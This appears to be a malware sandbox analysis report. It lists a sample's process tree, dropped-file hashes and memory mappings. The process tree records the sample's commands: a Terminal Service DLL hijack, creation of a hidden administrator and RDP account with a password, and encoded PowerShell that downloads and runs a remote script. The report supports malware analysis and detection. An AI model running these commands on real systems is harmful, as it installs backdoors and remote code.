C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc h6iJyd4x /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc h6iJyd4x /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc h6iJyd4x /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc h6iJyd4x1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc h6iJyd4x2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc h6iJyd4x3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Knots.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Temp\66B4.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\66B4.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\818.exeMD5
fd4e0205ce36f99ff343a78ec3e251bc
SHA1b633df31339acb69f708a41fd227298420fd4036
SHA256617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
SHA512f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
-
C:\Users\Admin\AppData\Local\Temp\818.exeMD5
fd4e0205ce36f99ff343a78ec3e251bc
SHA1b633df31339acb69f708a41fd227298420fd4036
SHA256617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
SHA512f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
-
C:\Users\Admin\AppData\Local\Temp\818.exeMD5
fd4e0205ce36f99ff343a78ec3e251bc
SHA1b633df31339acb69f708a41fd227298420fd4036
SHA256617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
SHA512f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
-
C:\Users\Admin\AppData\Local\Temp\93FF.exeMD5
77ce7ab11225c5e723b7b1be0308e8c0
SHA1709a8df1d49f28cf8c293694bbbbd0f07735829b
SHA256d407b5c7d9568448f1e7387924fe4dded9e016632879c386c307ef5dcf63f496
SHA512f73582206397db625bdefbbaf8abdc1a820ae8054eb2ef2a3ed18c8e00e8365c7ad81013b33990e4304619b3834a1b8b15c782905204add158fca686e2c25c3b
-
C:\Users\Admin\AppData\Local\Temp\93FF.exeMD5
77ce7ab11225c5e723b7b1be0308e8c0
SHA1709a8df1d49f28cf8c293694bbbbd0f07735829b
SHA256d407b5c7d9568448f1e7387924fe4dded9e016632879c386c307ef5dcf63f496
SHA512f73582206397db625bdefbbaf8abdc1a820ae8054eb2ef2a3ed18c8e00e8365c7ad81013b33990e4304619b3834a1b8b15c782905204add158fca686e2c25c3b
-
C:\Users\Admin\AppData\Local\Temp\AC0C.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\AC0C.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\D753.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\D753.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\Knots.exeMD5
e1c9ff41a69e7b381d498c56243e3f19
SHA1b09e041a9d71ab8bc5965ffb3dd14d74ea932bce
SHA2561482d5afef2f604625b850fbe609699c64a342d1880e9d27ef62a77817b75cdc
SHA512a005c87491bb48d96af386e8ed9cf3604a2fa708ea03219404587d69470e4516e8e71f7306e107c98b9baea83de29490cf81cdd216e752fce9b4019cf069885e
-
C:\Users\Admin\AppData\Local\Temp\Knots.exeMD5
e1c9ff41a69e7b381d498c56243e3f19
SHA1b09e041a9d71ab8bc5965ffb3dd14d74ea932bce
SHA2561482d5afef2f604625b850fbe609699c64a342d1880e9d27ef62a77817b75cdc
SHA512a005c87491bb48d96af386e8ed9cf3604a2fa708ea03219404587d69470e4516e8e71f7306e107c98b9baea83de29490cf81cdd216e752fce9b4019cf069885e
-
C:\Users\Admin\AppData\Local\Temp\Knots.exeMD5
e1c9ff41a69e7b381d498c56243e3f19
SHA1b09e041a9d71ab8bc5965ffb3dd14d74ea932bce
SHA2561482d5afef2f604625b850fbe609699c64a342d1880e9d27ef62a77817b75cdc
SHA512a005c87491bb48d96af386e8ed9cf3604a2fa708ea03219404587d69470e4516e8e71f7306e107c98b9baea83de29490cf81cdd216e752fce9b4019cf069885e
-
C:\Users\Admin\AppData\Local\Temp\RES7C4B.tmpMD5
966ebe26f37e7d46cef677af3727bada
SHA1db9a694c05425a11cee97b2344dcf6f441593a51
SHA256cc15c3449b65d084218644ca07df7e359887130dea4fee9d1b613b83d3f0f75e
SHA5124d5bb06d1468893586813305b3e51db00aa9b939edaf94f9176b839aa47c723228c4bde8d6ab452d493e5679a4378ac17d04d7b052567b82b2d6493b13a8a8ad
-
C:\Users\Admin\AppData\Local\Temp\RES815C.tmpMD5
bb5225f74be369bd99427cc508a65359
SHA13b7902e3df8d46044dab6ff914c99d5ab28c98fa
SHA2564db0d8c2b6c35e1d7f72df0d49b3304bd62c056613095439c55ad3fc56aac04b
SHA51246d81400c70025308c3d43262cd848133c402e7974bad4986b5b27e40eba7a476d6285d547bed5c2e96c6bc591fd9526fb73f6bfd18017827374e479d402af41
-
C:\Users\Admin\AppData\Local\Temp\d4myurk4\d4myurk4.dllMD5
b34720a050aa91a122cd7fc82d66d2f7
SHA11eb82ec4dd47730b1e30c196b587a7a4fc9d63ab
SHA25636db98c21fd44c13f4cc24368e58fc447a1893879670eab21fb7f5ea6d6bd45a
SHA5126a0f43343bac4f2d0e943718ad34021efcae54375bea6d949187856b39d93f9c3c24776211dd3e0704a6de05ff2ec3a7d120eed6a84eab33a80d4dbe190bbc66
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
854b2dfc0a28f2959b1d2fc363a4e318
SHA1ce1753052c5bdad56708ec75d8085b2c597df6c1
SHA2567135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
SHA512b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\yslfveqh\yslfveqh.dllMD5
e904eaf43f600d22faa4a8aa1e26c0ed
SHA1c26a4e740621049b88896d4a7212ec2203fdd214
SHA25615d7dd66722d321a8210296732d927221fbffbdfe92e08af33508262799bd4cf
SHA51249e920bf4152e493c7bd83485b5add2763314c2ace63b6b69b405b10982352a0c698997d0035c709cc1c4385a2760d961602e7cfa9356599ae1982d56e1b010d
-
\??\c:\Users\Admin\AppData\Local\Temp\d4myurk4\CSC164F69DC1D604A2CA266B1C51A7947C4.TMPMD5
e43b6626a34b1308744537d455046d61
SHA155166237a7ee02c3063f1dc1ce1e0541141f7783
SHA256df3fcc5f5e46b694fa52f913d3b288451d4e89ca0514baea15797c1918a3da04
SHA512cdc5b5147fa18f198f8eb22562c3757f9c1d28f7b7a7377e9ea420e2311be477aaf8fa9be12af9fc86a1924ab6dc6750963d8c5f7dd6235c885a0b6b4bf0612f
-
\??\c:\Users\Admin\AppData\Local\Temp\d4myurk4\d4myurk4.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\d4myurk4\d4myurk4.cmdlineMD5
b325fabaa494d0afff79fc7bdeda98ae
SHA1bbbdcebe33dbda4a215f452705e8cdd34bb1e554
SHA2562a8d3648ea146817ffce7c6c5a6628d493e090baedc9ba2f49a25df04e908258
SHA51246272a982cb5586a983bbc4a2add29a2d5a42c2d481a4dbafc8e9a31040e1a2047bda6afe692274f241cab80210b2a3acd7e91ecd90176994748af169e437530
-
\??\c:\Users\Admin\AppData\Local\Temp\yslfveqh\CSCD8AF42A3F41B44E48AB9BE8C7AC1C03D.TMPMD5
0cc3f1c49ab726f91234b28fe9329ec1
SHA1ca04bfbd8f81c02f8b6923e68c0b818584ad41aa
SHA2568af65b599cdaac8f190dd01e7772e2200b0e6a4b4989d7db56a3701429aa5e03
SHA51239058704f5f56f5851fc75d42062aac20358d24bfc634c740a52f67bce929b4e2b6f21e5374abe21e638323ab0310a278d0e16d192c606da3658d151c5d28b84
-
\??\c:\Users\Admin\AppData\Local\Temp\yslfveqh\yslfveqh.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\yslfveqh\yslfveqh.cmdlineMD5
fe2277f021e01c2f12dc99265a64728f
SHA1c03dba8154664f87304604290fb8526fc0d6309f
SHA2569427374ffe1dc55802b1880cfeb4d8ec37e58f6309bd5b7e07cae33f7d6ded78
SHA5129791ea7682b7eae78b4a410a5a01360d2844720e7472b80c20962480472e8f2c1a25e33edf1afcc8d94f669d41fda3febe0aeae5def597fd0a2c06405585e2d3
-
\Windows\Branding\mediasrv.pngMD5
83bd2c45f1faf20a77579cbb8765c2b3
SHA1fe01b295c1005f4cbc0cfcb277dac5e7c443622c
SHA256ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
SHA512e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
-
\Windows\Branding\mediasvc.pngMD5
af4e893deae35128088534aea49a1b74
SHA1ce25e8e738978a2106e3464a7a4bf0345e60fd31
SHA25676dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
SHA5123115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
-
memory/68-494-0x0000000000000000-mapping.dmp
-
memory/392-490-0x0000000000000000-mapping.dmp
-
memory/592-259-0x0000000000000000-mapping.dmp
-
memory/692-513-0x0000000000000000-mapping.dmp
-
memory/928-448-0x0000000000000000-mapping.dmp
-
memory/1016-286-0x0000020E24D88000-0x0000020E24D89000-memory.dmpFilesize
4KB
-
memory/1016-240-0x0000000000000000-mapping.dmp
-
memory/1016-263-0x0000020E24D83000-0x0000020E24D85000-memory.dmpFilesize
8KB
-
memory/1016-262-0x0000020E24D80000-0x0000020E24D82000-memory.dmpFilesize
8KB
-
memory/1016-264-0x0000020E24D86000-0x0000020E24D88000-memory.dmpFilesize
8KB
-
memory/1136-447-0x0000000000000000-mapping.dmp
-
memory/1164-229-0x0000000002C70000-0x0000000002DBA000-memory.dmpFilesize
1.3MB
-
memory/1164-228-0x0000000002C70000-0x0000000002DBA000-memory.dmpFilesize
1.3MB
-
memory/1164-230-0x0000000000400000-0x0000000002B74000-memory.dmpFilesize
39.5MB
-
memory/1196-403-0x00000238EBD23000-0x00000238EBD25000-memory.dmpFilesize
8KB
-
memory/1196-265-0x0000000000000000-mapping.dmp
-
memory/1196-507-0x0000000000000000-mapping.dmp
-
memory/1196-384-0x0000000000000000-mapping.dmp
-
memory/1196-436-0x00000238EBD26000-0x00000238EBD28000-memory.dmpFilesize
8KB
-
memory/1196-402-0x00000238EBD20000-0x00000238EBD22000-memory.dmpFilesize
8KB
-
memory/1292-446-0x0000000000000000-mapping.dmp
-
memory/1432-512-0x0000000000000000-mapping.dmp
-
memory/1480-160-0x0000000006B80000-0x0000000006B81000-memory.dmpFilesize
4KB
-
memory/1480-139-0x0000000000000000-mapping.dmp
-
memory/1480-142-0x0000000000860000-0x0000000000861000-memory.dmpFilesize
4KB
-
memory/1480-149-0x0000000004FE0000-0x00000000055E6000-memory.dmpFilesize
6.0MB
-
memory/1748-506-0x0000000000000000-mapping.dmp
-
memory/1796-508-0x0000000000000000-mapping.dmp
-
memory/1816-497-0x0000000000000000-mapping.dmp
-
memory/1836-222-0x0000000002BD0000-0x0000000002BD6000-memory.dmpFilesize
24KB
-
memory/1836-213-0x0000000000000000-mapping.dmp
-
memory/1836-223-0x0000000002BE0000-0x0000000002BE5000-memory.dmpFilesize
20KB
-
memory/1836-227-0x0000000000400000-0x0000000002B74000-memory.dmpFilesize
39.5MB
-
memory/1856-504-0x0000000000000000-mapping.dmp
-
memory/1880-118-0x0000000000650000-0x0000000000666000-memory.dmpFilesize
88KB
-
memory/2056-514-0x0000000000000000-mapping.dmp
-
memory/2108-496-0x0000000000000000-mapping.dmp
-
memory/2140-191-0x00000000052E0000-0x00000000052E1000-memory.dmpFilesize
4KB
-
memory/2140-183-0x0000000000000000-mapping.dmp
-
memory/2140-192-0x00000000051D0000-0x00000000051D1000-memory.dmpFilesize
4KB
-
memory/2140-186-0x0000000000A00000-0x0000000000A01000-memory.dmpFilesize
4KB
-
memory/2336-501-0x0000000000000000-mapping.dmp
-
memory/2420-117-0x0000000000400000-0x00000000004CC000-memory.dmpFilesize
816KB
-
memory/2420-116-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/2544-500-0x0000000000000000-mapping.dmp
-
memory/2544-586-0x0000019A98448000-0x0000019A98449000-memory.dmpFilesize
4KB
-
memory/2544-532-0x0000019A98443000-0x0000019A98445000-memory.dmpFilesize
8KB
-
memory/2544-531-0x0000019A98440000-0x0000019A98442000-memory.dmpFilesize
8KB
-
memory/2544-515-0x0000000000000000-mapping.dmp
-
memory/2544-535-0x0000019A98446000-0x0000019A98448000-memory.dmpFilesize
8KB
-
memory/2552-194-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/2552-210-0x00000000056D0000-0x0000000005CD6000-memory.dmpFilesize
6.0MB
-
memory/2552-196-0x0000000000418FB6-mapping.dmp
-
memory/2640-510-0x0000000000000000-mapping.dmp
-
memory/2784-354-0x0000016D16E80000-0x0000016D16E82000-memory.dmpFilesize
8KB
-
memory/2784-338-0x0000000000000000-mapping.dmp
-
memory/2784-355-0x0000016D16E83000-0x0000016D16E85000-memory.dmpFilesize
8KB
-
memory/2784-399-0x0000016D16E86000-0x0000016D16E88000-memory.dmpFilesize
8KB
-
memory/2784-401-0x0000016D16E88000-0x0000016D16E8A000-memory.dmpFilesize
8KB
-
memory/2828-274-0x0000000000000000-mapping.dmp
-
memory/2936-172-0x0000000000260000-0x0000000000261000-memory.dmpFilesize
4KB
-
memory/2936-168-0x00000000003E0000-0x00000000003E1000-memory.dmpFilesize
4KB
-
memory/2936-174-0x00000000725E0000-0x0000000072660000-memory.dmpFilesize
512KB
-
memory/2936-182-0x0000000070830000-0x000000007087B000-memory.dmpFilesize
300KB
-
memory/2936-169-0x00000000773A0000-0x0000000077562000-memory.dmpFilesize
1.8MB
-
memory/2936-179-0x0000000076250000-0x00000000767D4000-memory.dmpFilesize
5.5MB
-
memory/2936-188-0x0000000004DD0000-0x0000000004DD1000-memory.dmpFilesize
4KB
-
memory/2936-170-0x00000000009E0000-0x0000000000A25000-memory.dmpFilesize
276KB
-
memory/2936-167-0x0000000000260000-0x00000000002CC000-memory.dmpFilesize
432KB
-
memory/2936-164-0x0000000000000000-mapping.dmp
-
memory/2936-171-0x0000000075D00000-0x0000000075DF1000-memory.dmpFilesize
964KB
-
memory/2936-180-0x00000000748B0000-0x0000000075BF8000-memory.dmpFilesize
19.3MB
-
memory/2960-492-0x0000000000000000-mapping.dmp
-
memory/3020-509-0x0000000000000000-mapping.dmp
-
memory/3068-503-0x0000000000000000-mapping.dmp
-
memory/3372-486-0x0000000000000000-mapping.dmp
-
memory/3396-505-0x0000000000000000-mapping.dmp
-
memory/3432-495-0x0000000000000000-mapping.dmp
-
memory/3448-491-0x0000000000000000-mapping.dmp
-
memory/3524-238-0x000001CDCE6A5000-0x000001CDCE6A6000-memory.dmpFilesize
4KB
-
memory/3524-231-0x0000000000000000-mapping.dmp
-
memory/3524-237-0x000001CDCE6A3000-0x000001CDCE6A5000-memory.dmpFilesize
8KB
-
memory/3524-236-0x000001CDCE6A0000-0x000001CDCE6A2000-memory.dmpFilesize
8KB
-
memory/3524-239-0x000001CDCE6A6000-0x000001CDCE6A7000-memory.dmpFilesize
4KB
-
memory/3652-511-0x0000000000000000-mapping.dmp
-
memory/3704-353-0x0000023CF73C8000-0x0000023CF73CA000-memory.dmpFilesize
8KB
-
memory/3704-312-0x0000023CF73C6000-0x0000023CF73C8000-memory.dmpFilesize
8KB
-
memory/3704-301-0x0000023CF73C3000-0x0000023CF73C5000-memory.dmpFilesize
8KB
-
memory/3704-300-0x0000023CF73C0000-0x0000023CF73C2000-memory.dmpFilesize
8KB
-
memory/3704-294-0x0000000000000000-mapping.dmp
-
memory/3744-129-0x00000000725E0000-0x0000000072660000-memory.dmpFilesize
512KB
-
memory/3744-132-0x0000000005CA0000-0x0000000005CA1000-memory.dmpFilesize
4KB
-
memory/3744-163-0x0000000007CC0000-0x0000000007CC1000-memory.dmpFilesize
4KB
-
memory/3744-123-0x0000000000190000-0x00000000001F8000-memory.dmpFilesize
416KB
-
memory/3744-154-0x0000000006AD0000-0x0000000006AD1000-memory.dmpFilesize
4KB
-
memory/3744-119-0x0000000000000000-mapping.dmp
-
memory/3744-124-0x00000000013B0000-0x00000000013B1000-memory.dmpFilesize
4KB
-
memory/3744-125-0x00000000773A0000-0x0000000077562000-memory.dmpFilesize
1.8MB
-
memory/3744-126-0x0000000075D00000-0x0000000075DF1000-memory.dmpFilesize
964KB
-
memory/3744-153-0x0000000006000000-0x0000000006001000-memory.dmpFilesize
4KB
-
memory/3744-127-0x0000000000190000-0x0000000000191000-memory.dmpFilesize
4KB
-
memory/3744-130-0x0000000006180000-0x0000000006181000-memory.dmpFilesize
4KB
-
memory/3744-131-0x0000000005B70000-0x0000000005B71000-memory.dmpFilesize
4KB
-
memory/3744-122-0x00000000030D0000-0x0000000003115000-memory.dmpFilesize
276KB
-
memory/3744-152-0x0000000006C90000-0x0000000006C91000-memory.dmpFilesize
4KB
-
memory/3744-133-0x0000000005BD0000-0x0000000005BD1000-memory.dmpFilesize
4KB
-
memory/3744-134-0x0000000005B60000-0x0000000005B61000-memory.dmpFilesize
4KB
-
memory/3744-135-0x0000000076250000-0x00000000767D4000-memory.dmpFilesize
5.5MB
-
memory/3744-136-0x00000000748B0000-0x0000000075BF8000-memory.dmpFilesize
19.3MB
-
memory/3744-137-0x0000000005C10000-0x0000000005C11000-memory.dmpFilesize
4KB
-
memory/3744-138-0x0000000070830000-0x000000007087B000-memory.dmpFilesize
300KB
-
memory/3744-150-0x0000000005F00000-0x0000000005F01000-memory.dmpFilesize
4KB
-
memory/3744-151-0x0000000006020000-0x0000000006021000-memory.dmpFilesize
4KB
-
memory/3780-502-0x0000000000000000-mapping.dmp
-
memory/3868-493-0x0000000000000000-mapping.dmp
-
memory/4028-485-0x0000000000000000-mapping.dmp
-
memory/4052-271-0x0000000000000000-mapping.dmp